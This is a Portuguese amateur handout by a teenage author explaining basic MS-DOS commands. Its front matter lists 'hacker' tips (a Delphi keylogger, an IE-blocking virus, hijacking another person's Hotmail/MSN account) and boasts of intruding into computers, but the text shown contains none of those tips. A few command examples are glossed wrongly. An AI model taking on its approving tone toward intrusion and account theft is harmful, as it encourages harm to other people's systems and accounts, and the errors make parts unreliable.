NÉLIO DE JESUS JALOTO

APRESENTA:

COMANDOS BÁSICOS DO MS-DOS, E MUITO MAIS!!!
SUMÁRIO
Convenções Utilizadas na Apostila 1. Sistema Operacional 1.1. Definição 1.2. Tipos 2. MS-DOS 2.1. Conceitos Básicos 2.1.1. Arquivo 2.1.2. Prompt 2.1.3. Cursor 2.1.4. Boot 2.1.5. Reboot 2.2. Tipos de Comandos 2.2.1. Internos 2.2.2. Externos 2.3. Novos Conceitos 2.3.1. Volume 2.3.2. Versão 3. Comandos do DOS 3.1. Cls 3.2. Dir 3.3. Time 3.4. Date 3.5. Diskcopy 3.6. Attrib 3.7. Del 3.8. Ver 3.9. Vol 3.10. Label 3.11. Format 3.12. Unformat 3.13. CHKDSK 3.14. Ren 3.15. Erase 3.16. Undelete 3.17. Doskey 3.18. Sys 3.19. Copy 3.20. Move 3.21. Type 3.22. More 3.23. PKZip® 3.24. PKUnzip® 3.25. Md 3.26. Cd 3.27. Rd 3.28. Tree 3.29. Prompt 3.30. Deltree 3.31. Xcopy 3 3 3 3 3 4 4 5 5 5 5 5 5 6 6 6 6 6 6 6 8 8 8 9 9 9 9 10 10 11 11 12 12 12 12 13 13 14 14 14 15 15 15 16 16 17 17 18 18

4. Arquivos de Configuração do Sistema 4.1. CONFIG.SYS 4.2. AUTOEXEC.BAT 5. Comandos Para “Batch Files” e Configuração do Sistema 5.1. Copy Con 5.2. @ 5.3. Edit 5.4. Path 5.5. Device 5.6. Echo 5.7. EMM386 5.8. Buffers 5.9. Files 5.10. Devicehigh 5.11. DOS 5.12. Pause 6. Outros Comandos 6.1. DOSSHELL 6.2. Help 6.3. Scandisk 6.4. Set

18 18 19 19 19 19 20 20 21 21 22 22 22 22 23 23 23 23 24 24 24

Momento eXPlorando e aprendendo Por Nélio Jaloto e Marcos Elias (vai incarar!!!)
Virus que nao deixa usar o internet explorer (em delphi) Desabilite alguns baloes do windows Como liberar 20% de sua banda de rede/Internet Remova o amarelao que o windows deixa no iniciar Tirando as setas dos seus ícones de atalho Dica: Como criar um keylogger! (em Delphi) Quer renomear a lixeira!?!? Quer Renomear a lixeira?Mais complicado mas é mas certo de conseguir!(pelo registro) Documentos compartilhados Seu pc reinicia sozinho? Fazendo backup do WPA,para evitar reativaçao. Strings você conhece? Conexão discada à 921,6Kbps (uso e recomendo) Process Explorer monitorar processos running(Programa) Travando tempo na Lan House!!! Antivirus muito útil: sua cabeça!!! Trave o msn de algum contato seu!!! O que o Windows guarda na pasta "System Volume Information"? Ela fica protegida... Mas dá pra fuçar! Vasculhe arquivos de logs do Windows em busca de informações úteis ou alheias, com o Windows File Analyzer!!! Algumas dicaszinhas do msn e por ultimo invasao de e-mail (pela hotmail)!!! key da microsoft!!! Como salvar vídeos do YouTube!!! Códigos JavaScript que eu uso e gosto :) Você conhece o programa:Messenger Discovery Live? Para que uma lixeira tão grande? Como retirar textos de arquivos PDF?!?!?!?... Como invadir hotmail de outra pessoal(invasao total msn,E-mail,etc...).E aonde fica a segurança tio Bill!!!Nao é 100%, Mas funciona. Assim quando eu queria ser "hacker" eu saia como maluco na net procurando livros programas varios programas apostilas que me ajudava a ser um "hacker"...Pocha, entao depois de um certo tempo de pesquisas eu vi que a soluçao dos meus problemas estava bem na minha frente mais ainda no iniciar e logo em seguida no executar, era o Ms-Dos onde eu podreia executar todas as minha aplicaçao (as veses eu nem uso o mouse fasso tudo pelo Ms-Dos).Entao eu ja sabia o que eu queria e sabia que era o certo, era aprender o Ms-Dos onde eu poderia até invadir pcs (falei isso na minha primeira apostila favor baixar).Entao era só estudar o Ms-Dos e partir para o ataque onde você tem muito mais poder de fogo. Não adiantou nada,por que eu nao encontrava nehuma apostila na net, po achei muito errado nehuma pessoa compartilhar o que sabe com varias pessoas na net.Entao um dia eu ache foi quando eu vi varios e varios comando do Ms-Dos e po ai vai fui tentando um por um vi o que eles faziam e agora ate fasso algumas coisa considerado para justiça "crime" deixa pra lá... Agora eu vejo varios autor que as vezes tem um conteudo legal pra caramba e nao quer passar para frente quer vender!Um dia desse eu encontrei um comunidade no orkut onde dizia um garota "ai pessoal minha apostila hacker é show,si algem querer eu estarei disponibilizando a versao demo na net é so deixar o e-mail para eu mandar para vcs" e " e o preço dela completa esta na versao demo valeu galera" foi ai que eu nao perdi tempo foi logo em cima do topico dela eu publiquei a minha primeira apostila e dizendo em "CAPS LOCK" apostila hacker "GRATUITA"... Essa é a segunda ediçao da minha apostila, onde eu primeiro comento sobre o Windows que neste caso eu estarei falando do Ms-Dos e logo em seguida estarei falando muitas dicas para você usar no seu dia a dia,como si fosse um livro de bolso em que você poderia recorrer qualquer hora para tirar aquela duvida do Windows (é claro que nao todas,mas as melhores).É legal entao o leitor ter maldade no Ms-Dos saber né o que esta fazendo,si você sabe que si invadir um computador governamental vai ser preso uma hora ou outra entao nao faça isso, a nao ser que você ja estege preparado para as consequecia.ehehehe ADVERTÊNCIA: Este documento foi criado para informação de "hackers iniciantes" . De nenhuma forma, encorajando qualquer tipo de atividade ilegal, e qualquer ato praticado após a leitura deste documento é de inteira responsabilidade do leitor. Meu e-mail é nelio_jaloto@hotmail.com, no orkut http://www.orkut.com/Profile.aspx?uid=16422751250869153531!Por favor, se quiser copiar ou retirar algum dos trechos desse livro, me avise ou indique o meu nome na frente Sobre o autor:Meu nome é Nélio de Jesus Jaloto, moro em Tres Rios, RJ. Tenho 17 anos e amo a Internet e computação em geral, sou pesquisador amador na àrea O autor do Livro envidou os seus melhores esforços para fornecer as informações sobre a marca, o nome da empresa, os produtos e os serviços mencionados neste livro. A marca mostrada abaixo foi obtida de diversas fontes. O autor não pode estar à veracidade destas informações. MS-DOS é marca registrada da Microsoft Corporation. O nome do produto e serviços identificados neste livro é uma marca registrada ou propriedade de sua respectiva empresa. São utilizados neste livro exclusivamente de forma editorial e para o benefício dessa mesma empresa. Esses usos, ou o uso de qualquer outra marca, não indica concordância e nenhum tipo de associação com o livro.

Nenhuma parte deste livro, sem a autorização prévia por escrito do autor, poderá ser reproduzida ou transmitida sejam quais forem os meios empregados: eletrônicos, mecânicos, fotográficos, gravação ou quaisquer outros. Todo o esforço foi feito para fornecer a mais completa e adequada informação. Contudo o autor não assumem responsabilidade pelos resultados e uso da informação fornecida. Recomendamos ao leitores testar a informação antes de sua utilização. Todos os direitos resevado.

Convenções Utilizadas na Apostila:
• Qualquer parâmetro que apareça entre colchetes na sintaxe de um comando, é um parâmetro opcional. Ex.: Na sintaxe do comando “vol” (seção 3.9) - Vol [drive:] , o parâmetro drive: é opcional, pois está entre aspas, i.é., o comando não vai deixar de funcionar se nós não utilizarmos este parâmetro. • Quando forem apresentados dois parâmetros dentro de um mesmo par de colchetes e separados por uma barra vertical (“|”), só pode ser usado um dos dois. Ex.: Dois dos parâmetros do comando “Attrib” (seção 3.6) são [+H|-H]; eles são opcionais, porém ou eu uso o +H, ou eu uso o -H.

1. Sistema Operacional
Para se utilizar um computador, são necessárias pelo menos duas coisas: o computador propriamente dito e um sistema operacional. Abaixo, segue a definição de sistema operacional.

1.1. Definição
Entende-se por Sistema Operacional um programa ou conjunto de programas feitos para administrar o computador e seus periféricos (drives, discos rígidos, impressora...), bem como o fluxo de dados que passa por ele. É como se o sistema operacional fosse um tradutor, dizendo ao computador (na linguagem dele) o que nós queremos que ele faça.

1.2. Tipos
Hoje em dia, podemos encontrar uma boa variedade de sistemas operacionais no mercado. Dentre eles, o MS-DOS (que é o que será utilizado no decorrer do curso) está entre os mais usados. Outros sistemas operacionais são: • DR-DOS, que segue mais ou menos o mesmo estilo do MS-DOS; • PC-DOS, também com algumas diferenças em relação ao MS-DOS • Novell DOS, sistema operacional similar ao MS-DOS contendo algumas diferenças em relação à sintaxe dos comandos, e podendo ser usado em rede; • OS/2, sistema operacional contendo interface gráfica (similar ao ambiente Windows). dentre muitos outros. Esses são os mais conhecidos e mais utilizados atualmente.

2. MS-DOS
MS-DOS (MicroSoft Disk Operating System, ou Sistema Operacional em Disco da Microsoft) é o sistema operacional mais conhecido e difundido em todo o mundo hoje em dia. A versão a ser usada no nosso curso é a versão 6.20. Essa é a terceira versão mais atual do MS-DOS (eu acho) (chamaremos o MS-DOS somente de DOS daqui em diante), sendo a mais atual a 6.22, que sofreu pequenas alterações em relação à 6.20. A primeira versão do DOS foi a 1.0, passando em seguida a 2.0, e depois a 3.0, 3.1, 3.2 e 3.3. Após esta, a Microsoft lançou no mercado a 4.0, 4.01 e a 5.0, seguidas pelas versões 6.0, 6.20 e 6.21.

O DOS é composto basicamente de três arquivos: MSDOS.SYS (DOS propriamente dito), IO.SYS (controla fluxo de dados) e COMMAND.COM (interpretador de comandos do DOS; ele aceita e executa os seus comandos).

2.1. Conceitos Básicos
A seguir, relacionam-se cinco conceitos muito importantes e fundamentais para o aprendizado de DOS.

2.1.1. Arquivo
Um arquivo é na verdade um conjunto de informações gravadas em um disco. Podemos dar nomes a arquivos, mas existe uma norma a seguir na hora de nomear um arquivo. O nome de um arquivo deve ser escrito como está representado abaixo: NOME-ARQ.EXT onde NOME-ARQ é o nome do arquivo propriamente dito com no máximo 8 caracteres, e EXT é a extensão do nome com no máximo 3 caracteres. Normalmente, usa-se a extensão para identificar o tipo de arquivo com o qual estamos trabalhando, por exemplo: Extensão .BAK .BAS .BAT .BIN .COM .DAT .DOC .EXE .HLP .SYS Significado Arquivo de backup (cópia de segurança) Programa fonte em BASIC Arquivo de Lote (ou “batch”) Programa no formato binário Arquivo de comandos (arquivo executável) Arquivo de dados Arquivo de texto Programa executável Arquivo de ajuda (Help) Arquivo do sistema operacional

O uso da extensão não é obrigatório. Podemos também tirar proveito de um recurso do DOS muito útil para nós: o uso de coringas ou “wild cards”. Nós temos à nossa disposição dois coringas: o caractere * e o caractere ?. O * substitui um grupo de caracteres enquanto o ? substitui um único caractere. Por exemplo, se nós quisermos fazer uma cópia de todos os arquivos de lote que nós possuímos em um determinado disco, podemos nos referir a eles da seguinte maneira: *.BAT. Com isso, não precisaremos copiar um de cada vez, mas sim todos de uma vez só (o que é muito mais prático). ATENÇÃO: Os caracteres relacionados a seguir não podem ser usados no nome de um arquivo por serem caracteres reservados: . / \ [ ] : * | < > + = ; , ? e o espaço Os arquivos possuem um determinado tipo de identificação a qual nós chamamos de atributo. Existem quatro tipos de atributos: • R (“Read-only”): indica que os arquivos que os possuem ativados são somente para leitura, não podendo ter os seus respectivos conteúdos alterados. • A (“Archive”): sua função é dizer se o arquivo sofreu uma cópia de segurança (ativado) ou não (desativado).

• S (“System”): indica que o arquivo contém informações especiais sobre o sistema. • H (“Hidden”): literalmente esconde o arquivo do diretório (ver seção 3.2). Hidden em inglês significa escondido. Maiores informações sobre atributos podem ser encontradas nas seções 3.2 e 3.6.

2.1.2. Prompt
O prompt é um sinal do DOS dizendo a você que ele está pronto para receber um comando seu e executá-lo. Logo que ligamos o computador, observamos no canto esquerdo do monitor algo parecido com C:\> seguido de um tracinho piscante. Esse C:\> é o prompt do DOS e o tracinho piscante nós chamamos de cursor.

2.1.3. Cursor
O cursor (caractere sublinhado) nos diz a nossa posição atual na tela, na qual aparecerá um novo texto a ser digitado.

2.1.4. Boot
Chamamos de dar o boot ao processo usado para se ligar (ou inicializar) o computador. Também chamado de partida à frio (ou ainda cold boot), acontece quando ligamos o computador pela primeira vez, isto é, acionamos o interruptor que liga o computador. Quando damos o boot, o computador faz alguns testes como verificação de teclado e de memória, entre outros.

2.1.5. Reboot
Entende-se por reboot reinicializar o computador. Também chamado de partida à quente (ou ainda warm boot), acontece quando acionamos o botão de reset do computador ou quando pressionamos simultaneamente as teclas CONTROL, ALT e DEL. A diferença está na bateria de testes realizada pelo computador na ocasião do reboot: quando usamos o botão de reset, provocamos um curto na máquina durante um pequeno intervalo de tempo. Isto simula uma partida à frio e força o computador a realizar toda a bateria de testes de novo. Porém, quando usamos a combinação CONTROL+ALT+DEL, o computador não realiza todos os testes (o teste de memória, por exemplo, não é realizado).

2.2. Tipos de Comandos
No DOS nós encontramos dois tipos diferentes de comando: os comandos internos e os comandos externos.

2.2.1. Internos
São comandos que estão localizados na memória de acesso aleatório (RAM). Eles estão embutidos no arquivo COMMAND.COM, que é carregado para a memória assim que nós damos o boot no computador.

2.2.2. Externos
São comandos que não estão embutidos no COMMAND.COM, portanto não são carregados para a memória quando da ocasião do boot. Suas funções são lidas de um disco para a memória, utilizadas e em seguida apagadas da memória.

2.3. Novos Conceitos
Dois novos conceitos foram implemetados ao DOS. São os conceitos de volume e versão.

2.3.1. Volume
Daremos o nome de volume a um disco para nos facilitar a sua identificação. Sempre que o DOS estiver formatando um disco, ele pedirá a você um nome de volume, o qual pode conter no máximo 11 caracteres. Para maiores detalhes sobre volume, veja as seções 3.9, 3.10 e 3.11.

2.3.2. Versão
A versão de um programa nos informa se ele é um programa atual ou não. Como um exemplo, podemos comparar a versão 1.0 do DOS com a versão 6.20: a primeira é muito antiga e hoje em dia já está obsoleta, não nos ajudando muito; já a 6.20 é mais atual e com muito mais recursos. À medida em que um programa vai sendo atualizado, isto é, que vai sendo lançada no mercado uma versão nova do mesmo programa, ele vai ganhando implementações e mais recursos para nos auxiliar.

3. Comandos do DOS
3.1 Cls
O comando CLS é uma abreviação do inglês “CLear Screen”, que significa limpar a tela. Isto quer dizer que quando você digitar cls, automaticamente o DOS limpará a tela do seu computador.

3.2. Dir
Podemos entender como diretório um conjunto de arquivos gravados em um disco. Todo disco tem um diretório principal (também chamado de diretório raiz), e esse diretório raiz pode conter outros diretórios dentro de si, os quais nós chamaremos de subdiretórios. O comando DIR (de DIRetório) nos dá a listagem dos arquivos contidos em um diretório, nos informando também o

tamanho do arquivo, a sua data e hora de criação. Para isso, usaremos a seguinte sintaxe: DIR [drive:][caminho][arquivo][/P][/W][/S][/B][/L][/O[:]ordem][/A[:]atrib] • [drive:] - é a letra do drive onde se encontra o diretório desejado. • [caminho] - é o caminho para se chegar a um subdiretório. • [arquivo] - é o nome do arquivo e sua extensão (quando possuir uma). /P - ativa uma pausa quando a tela ficar cheia, esperando que uma tecla seja pressionada para continuar. /W - mostra somente o nome dos arquivos e subdiretórios horizontalmente. /S - fornece a listagem do conteúdo dos subdiretórios sem precisarmos estar dentro deles. /B - mostra somente o nome dos arquivos sem tabulação. /L - mostra os arquivos em letra minúscula. Não converte caracteres expandidos para caixa baixa. /O[:]ordem - define a ordem de apresentação dos arquivos. A ordem a ser especificada é feita usando-se os parâmetros relacionados na tabela que segue, podendo ser utilizadas combinações entre eles sem a necessidade de espaçamento entre os mesmos. Parâmetro N -N E -E D -D S -S G -G Ordem Ordem alfabética por nome Ordem alfabética reversa por nome (de z para a) Ordem alfabética por extensão Ordem alfabética reversa por extensão (de z para a) Por data e hora, mais antigos primeiro Por data e hora, mais recentes primeiro Por tamanho, menor primeiro Por tamanho, maior primeiro Com diretórios agrupados antes dos arquivos Com diretórios agrupados depois dos arquivos

• • • • • •

• /A[:]atrib - define arquivos que serão apresentados de acordo com os seus atributos. Se o parâmetro /A for omitido, o comando dir mostrará todos os arquivos menos os arquivos escondidos (hidden - atributo H ativado). Se for especificado sem nenhum parâmetro, apresentará todos os arquivos incluindo os escondidos e os de sistema (system - atributo S ativado). Você poderá fazer combinações com os parâmetros abaixo (não é preciso espaçamento entre os códigos) para definir quais os arquivos serão apresentados. Segue a tabela: Parâmetro H -H S -S D -D A -A R -R Significado Somente arquivos escondidos (hidden) Qualquer arquivo que não seja escondido Somente arquivos do sistema (system) Qualquer arquivo que não seja do sistema Somente diretórios Somente arquivos Somente arquivos que estão prontos para backup (archive atriubto A ativado) Somente arquivos que sofreram alterações desde o último backup Somente arquivos de leitura (read-only - atributo R ativado) Qualquer arquivo que não seja exclusivamente de leitura

Exemplo: DIR *.COM /P /O (Lista todos os arquivos com extensão .COM pausadamente e em ordem alfabética)

3.3. Time
Mostra a hora do sistema ou ajusta o relógio interno do seu computador. Sua sintaxe é: Time [horas:[minutos:[segundos[.centésimos]]][A|P]] • • • • • [horas] - especifica a hora. Valores válidos: de 0 até 23. [minutos] - especifica os minutos. Valores válidos: de 0 até 59. [segundos] - especifica os segundos. Valores válidos: de 0 até 59. [centésimos] - especifica os centésimos. Valores válidos: de 0 até 99. [A|P] - especifica se é antes (A.M.) ou depois de meio-dia (P.M.) no formato 12 horas. Se você digitar uma hora válida no formato 12 horas, mas não usar nenhuma dessas duas opções, o comando usará A (A.M.).

Exemplo: TIME 15:20 (Muda hora do sistema para 3:20h da tarde).

3.4. Date
Mostra a data e permite que você a mude se necessário. Segue a sintaxe: Date [dd-mm-aa] • [dd-mm-aa] - especifica o dia (dd), o mês (mm) e o ano (aa). Eles devem estar separados por pontos (.), hífens (-) ou barras (/). Valores válidos para o dia: de 1 até 31; para o mês: de 1 até 12; para o ano: de 80 até 99 (ou de 1980 até 2099). Exemplo: DATE 10-12-95 (Muda a data para o dia 10 de outubro de 1995).

3. 5. Diskcopy
Copia todo o conteúdo de um disco para outro. O diskcopy escreverá por cima do conteúdo do disco destino conforme for copiando. Só pode copiar discos de mesma capacidade. Sua sintaxe é a seguinte: Diskcopy drive1: drive2: [/V] • drive1: - drive origem (deve ser especificado). • drive2: - drive destino. Caso não seja especificado, será assumido como drive destino o mesmo drive origem. • /V - copia verificando se os dados foram copiados corretamente. Isto torna o processo de cópia mais lento. Exemplo: DISKCOPY A: B: /V (Copia o conteúdo disco do drive A: para o disco do drive B: verificando a cópia) Nota: Se o disco destino não estiver formatado, o diskcopy irá formatá-lo automaticamente.

3.6. Attrib
Comando cuja função é exibir, ativar ou desativar um ou mais atributos de um arquivo (ou grupo de arquivos) ou de um diretório. Sintaxe: Attrib [+R|-R] [+A|-A] [+S|-S] [+H|-H] [drive:][caminho][arquivo] • [drive:][caminho][arquivo] - corresponde ao drive onde está o arquivo (ou grupo de arquivos), ao caminho do seu subdiretório e ao nome do arquivo. • [+R|-R] - ativa (+) ou desativa (-) o atributo R (Read-only). • [+A|-A] - ativa (+) ou desativa (-) o atributo A (Archive). • [+S|-S] - ativa (+) ou desativa (-) o atributo S (System). • [+H|-H] - ativa (+) ou desativa (-) o atributo H (Hidden). Exemplo: ATTRIB +R COMMAND.COM (Ativa o atributo R do arquivo COMMAND.COM)

3.7. Del
seguinte: Apaga (deleta) um determinado arquivo (ou grupo de arquivos) especificado. A sintaxe usada para o comando del é a Del [drive:][caminho][arquivo] [/P] • • • • [drive:] - drive no qual se encontra o arquivo (ou grupo de arquivos) a ser deletado. [caminho] - caminho para o subdiretório onde está o arquivo (ou grupo de arquivos) a ser deletado. [arquivo] - nome do arquivo (ou grupo de arquivos) a ser deletado. /P - pedirá confirmação antes de apagar o arquivo. Exemplo: DEL *.TXT (Apaga todos os arquivos com extensão .EXE)

3.8. Ver
Retorna a versão do sistema operacional. Basta digitarmos ver sem parâmetro nenhum.

3.9. Vol
Este comando nos retorna o nome do volume e o número de série do disco especificado. A sintaxe usada para este comando é a seguinte: Vol [drive:] • [drive:] - drive do qual se deseja obter essas informações. Exemplo: VOL C: (Diz qual o nome de volume do drive C:) Para maiores detalhes sobre volume e número de série de um disco, veja as seções 2.2.1. 3.10 e 3.11.

3.10. Label
O comando label cria, modifica ou apaga o nome de um volume especificado. Sua sintaxe é: Label [drive:] [nomevol] • [drive:] - drive no qual desejamos fazer as alterações. • [nomevol] - é o nome que se quer colocar no volume. Um nome de volume poderá conter no máximo 11 caracteres. Podemos usar o caractere espaço no nome de volume. Exemplo: LABEL C: AMPRO (Muda o nome de volume do drive C: para AMPRO)

3.11. Format
Todo disco usado pelo MS-DOS tem um tipo de organização que ele utiliza para gravar e recuperar dados com precisão. Essa organização faz com que o DOS divida o disco em várias partes chamadas trilhas e estas, por sua vez, estão divididas em setores. Porém, o disco quando é fabricado não é organizado desta maneira. Então, como fazê-lo? Usamos um processo chamado formatação que é feito pelo próprio DOS através do comando format. Podemos também usar este comando para reformatar um disco já formatado. A sintaxe do comando format é a seguinte: Format drive: [/V[:nomevol]] [/Q] [/U] [/F:tamanho] [/B|/S] Format drive: [/V[:nomevol]] [/Q] [/U] [/1] [/4] [/B|/S] Format drive: [/Q] [/U] [/1] [/4] [/8] [/B|/S] • /V:nomevol - especifica um nome para o volume. Se este parâmetro for especificado sem um nome de volume ou não for especificado, ao final da formatação o DOS pedirá um nome para o volume. Se você formatar mais de um disco em sequência usando um único comando format, o nome que foi fornecido com este parâmetro será dado a todos os discos. Este parâmetro não é compatível com o parâmetro /8. Para mais informações sobre volume, veja as seções 2.3.1, 3.2, 3.9 e 3.10. • /Q - executa uma formatação rápida (“quickformat”) do disco. Só pode ser usado em discos que já tenham sido formatados pelo menos uma vez. Aconselha-se usar este parâmetro em discos que você tenha certeza de estarem em boas condições. • /U - diz ao DOS para executar uma formatação incondicional, isto é, ele não salva determinadas informações do disco antes de formatá-lo, não permitindo que você o recupere caso venha a se arrepender de ter feito a formatação. Você deve usar este parâmetro caso o computador acuse erro de escrita ou de leitura durante o uso do disco. Para saber mais sobre como recuperar um disco após uma formatação, veja a seção 3.12.

• /F:tamanho - especifica o tamanho em que se deseja que um disco seja formatado. Podemos especificar como tamanho os valores que seguem na tabela seguinte:

Valores 160 180 320 360 720 1200 ou 1.2 1440 ou 1.44 2880 ou 2.88

Capacidade 160 KB 180 KB 320 KB 360 KB 720 KB 1.2 Mb 1.44 Mb 2.88 Mb

Face simples simples dupla dupla dupla dupla dupla dupla

Densidade dupla dupla dupla dupla dupla alta alta extra

Disco 5¼ 5¼ 5¼ 5¼ 3½ 5¼ 3½ 3½

Podemos acrescentar aos valores exatos as letras K ou KB, e aos valores decimais as letras M ou MB. • /B - mantido somente por questões de compatibilidade, este parâmetro diz ao DOS para reservar uma área do disco para os arquivos de sistema MSDOS.SYS e IO.SYS como arquivos escondidos (nas versões mais antigas do DOS, era necessário reservar um espaço em disco para esses arquivos antes de transferí-los com o comando sys). • /S - ao final da formatação, o DOS transfere os arquivos de sistema MSDOS.SYS, IO.SYS e COMMAND.COM do disco de inicialização do sistema para o disco que foi formatado, se este parâmetro for especificado. Se o DOS não encontrar esses arquivos de sistema, ele pedirá para você colocar um disco que os contenha. O disco que receberá estes arquivos poderá ser usado como um novo disco de sistema (também chamado de disco de boot). • /1 - formata um único lado de um disco flexível. • /4 - formata um disco de 5 ¼ dupla face/dupla densidade (360 KB), em um drive de alta densidade (1.2 Mb). Alguns drives de dupla densidade (360 KB) não conseguem ler discos formatados com o uso do parâmetro /4. Se for usado em conjunto com o parâmetro /1, formatará um disco de 5 ¼ face simples 180KB. • /8 - formata um disco de 5 ¼ com 8 setores por trilha. Esse parâmetro formata discos para uso com versões do MS-DOS anteriores a 2.0. Exemplo: FORMAT B: /U /Q (Formata o disco que está no drive B: incondicionalmente e rapidamente)

3.12. Unformat
Restaura discos apagados pelo uso do comando format. Sua sintaxe é: Unformat drive: [/P] • /P - envia as mensagens para a impressora conectada na porta 1 (LPT1). Exemplo: UNFORMAT A: (Restaura o disco que está no drive A:)

3.13. Chkdsk
Executa o Programa CHKDSK, que analisa o disco especificado e emite relatório sobre o estado dele e da memória. Para mostrar o estado do disco que está no drive atual, basta digitar: CHKDSK. Sua sintaxe é a seguinte: Chkdsk [drive:] [[caminho] arquivo] [/F] • drive: - diz ao DOS qual o drive a ser analisado pelo Checkdisk. • [caminho] arquivo - se o caminho e o nome de um arquivo (os curingas são válidos) for especificado, o Checkdisk verificará se este arquivo (ou grupo de arquivos) está fragmentado ou não. • /F - corrige eventuais erros encontrados durante a análise. Exemplo: CHKDSK A: (Analisa o disco que está no drive A:)

3.14. Ren
É usado para mudar o nome de um arquivo (ou grupo de arquivos). Usamos o comando ren da seguinte maneira: Ren [drive:][caminho] arq1 arq2 • [drive][caminho] - corresponde ao drive onde está o arquivo e o caminho do seu subdiretório. • arq1 - é o nome do arquivo que se quer renomear. • arq2 - é o novo nome do arquivo. Exemplo: REN AMPRO.EXE CURSO.COM (Muda o nome do arquivo AMPRO.EXE para CURSO.COM)

3.15. Erase
Idem ao del, com os mesmos parâmetros. A sintaxe é a seguinte: Erase [drive:][caminho][arquivo] [/P] Exemplo: ERASE A:*.EXE (Apaga todos os arquivos com extensão .EXE do drive A:)

3.16. Undelete
Tem como objetivo recuperar arquivos previamente apagados pelo comando del. Sua sintaxe é: Undelete [drive:][caminho][arquivo] [/ALL][/LIST] • /ALL - recupera automaticamente os arquivos especificados. • /LIST - lista os arquivos disponíveis para recuperação no diretório especificado. Exemplo: UNDELETE /ALL (Recupera automaticamente todos os arquivos apagados pelo comando del que forem encontrados em bom estado)

3.17. Doskey

O Doskey é um programa que vem com o DOS que reserva uma área da memória para armazenar os comandos anteriormente digitados. Vamos supor que você digite o comando cls e execute-o; em seguida você usa o comando dir a:. Se depois de executar o comando dir a: você teclar a seta para cima, ele reaparecerá na tela, e se você usar a seta para cima de novo aparecerá o cls. Podemos caminhar pela lista de comandos não só usando a seta para cima como também a seta para baixo. Basta selecionarmos um comando que o DOS remontará a linha de comando correspondente àquele comando, bastando teclarmos ENTER ou modificarmos a linha de acordo com as nossas necessidades. Você também pode utilizar as teclas PageUp e PageDown para se locomover direto para o início ou para o fim da lista, respectivamente. O Doskey pode armazenar uma quantidade grande de comandos, tornando cansativa a busca de determinado comando após a lista de comandos anteriores ficar grande. Porém, o Doskey nos oferece outro recurso para localizar um comando: são as teclas F7 e F9. Utilizando a tecla F7, o Doskey nos apresenta os comandos anteriores em uma lista numerada. No exemplo acima ele mostraria o seguinte: 1: cls 2: dir a: Quando apertarmos a tecla F9, o DOS nos pedirá o número da linha. Supondo que nós queiramos que ele execute o comando cls novamente, basta entrarmos o número da linha que o DOS remontará a linha de comando para nós, bastando apenas teclarmos ENTER. Para carregarmos o Doskey para a memória do computador, basta digitarmos DOSKEY. ATENÇÃO: Mesmo que o Doskey não esteja na memória, dispomos de duas teclas de auxílio no DOS: F1 (ou a seta para direita) e F3. A tecla F1 permite que nós possamos remontar a última linha de comando caractere por caractere, e a tecla F3 permite que nós possamos reconstruir a última linha de comando de uma só vez. Elas continuam disponíveis quando o Doskey está na memória.

3.18. Sys
Cria um disco de boot copiando para ele os arquivos que compõem o sistema operacional (MSDOS.SYS, IO.SYS e COMMAND.COM). Sua sintaxe é: Sys drive: • drive: - diz ao comando o drive para o qual o sistema será transferido. Os arquivos de sistema só podem ser copiados para um diretório raiz, e não para um subdiretório. Exemplo: SYS A: (Transfere o sistema para o drive A:)

3.19. Copy
logo abaixo: Copia um arquivo (ou grupo de arquivos) de um disco para outro, ou ainda de um subdiretório para outro. Sua sintaxe está Copy origem destino [/V] • origem - localização do arquivo (ou grupo de arquivos) a copiar. • destino - para onde o arquivo (ou grupo de arquivos) será(ão) copiados. • /V - verifica se a cópia foi feita corretamente.

Exemplo: COPY A:*.EXE C: (Copia todos os arquivos com extensão .EXE do drive A: para o drive C:)

3.20. Move
Usamos o move para mover um arquivo de um diretório para outro, ou para renomear um diretório. Sua sintaxe é: Move [drive][caminho] arquivo1 [,[drive:] [caminho] arquivo2] • [drive:] [caminho] arquivo1- descrição do arquivo que se deseja mover. • [drive:] [caminho] arquivo2 - nome do diretório destino (se desejarmos mover um arquivo renomeando-o, basta especificarmos o novo nome onde lemos arquivo2, caso contrário não precisamos especificar nenhum outro nome de arquivo). Exemplo: MOVE AUTOEXEC.BAT A: (Move o arquivo AUTOEXEC.BAT para o drive A:)

3.21. Type
Permite que você veja o conteúdo de um arquivo texto sem modificá-lo (não permite o uso de coringas). Pode-se usar o comando “more” em conjutno com o type, sendo normalmente usados juntos quando o arquivo texto é muito grande. A função do comando more é ativar uma pausa quando o conteúdo do arquivo preencher uma tela, permitindo que você possa ler o conteúdo apresentado e em seguida teclar algo para prosseguir. Usamos o comando type da seguinte maneira: Type [drive:][caminho][arquivo] [|more] • [drive:][caminho][arquivo] - descrição do arquivo a ser visualizado (similar aos outros comandos). • [|more] - sintaxe a ser usada quando desejarmos o comando more associado ao type. Exemplo: TYPE LEIAME.TXT |MORE (Exibe o conteúdo do arquivo LEIAME.TXT pausadamente)

3.22. More
Mostra uma tela de dados de cada vez, i.é., mostra dados com pausa quando a tela ficar cheia. Sua sintaxe é: More < [drive:][caminho]arquivo • [drive:] - drive onde está o arquivo a ser visualizado. • [camihno:] - localização do arquivo dentro do drive especificado. • arquivo - nome do arquivo a ser visualizado. Exemplo: MORE < LEIAME.TXT (Exibe o conteúdo do arquivo LEIAME.TXT pausadamente)

3.23. PKZip®
O PKZip® é um programa que não acompanha o MS-DOS em nenhuma de suas versões, mas foi incorporado ao curso de MS-DOS por questões de praticidade e funcionalidade. Sua função é compactar (comprimir) arquivos, de modo que possamos liberar mais espaço em disco. Podemos especificar um grupo de arquivos a serem compactados e um nome de arquivo a parte, o qual conterá todos esse arquivos já compactados. Vejamos sua sintaxe: PKZip arqzip [arquivos] • arqzip - é o nome do arquivo destino. É o arquivo que conterá todos os dados compactados. Ele terá a extensão .ZIP, a qual não precisa ser especificada na linha de comando. • arquivos - são os arquivos a serem compactados. Se não for especificado esse parâmetro, todos os arquivos do diretório atual serão compactados. Exemplo: PKZIP AMPRO *.EXE (Compacta todos os arquivos de extensão .EXE do diretório atual para o arquivo AMPRO.ZIP) Nota1: Se arqzip já existir, os arquivos que forem compactados simplesmente serão acrescentados a ele. Nota2: A compactação não apaga os originais.

3.24. PKUnzip®
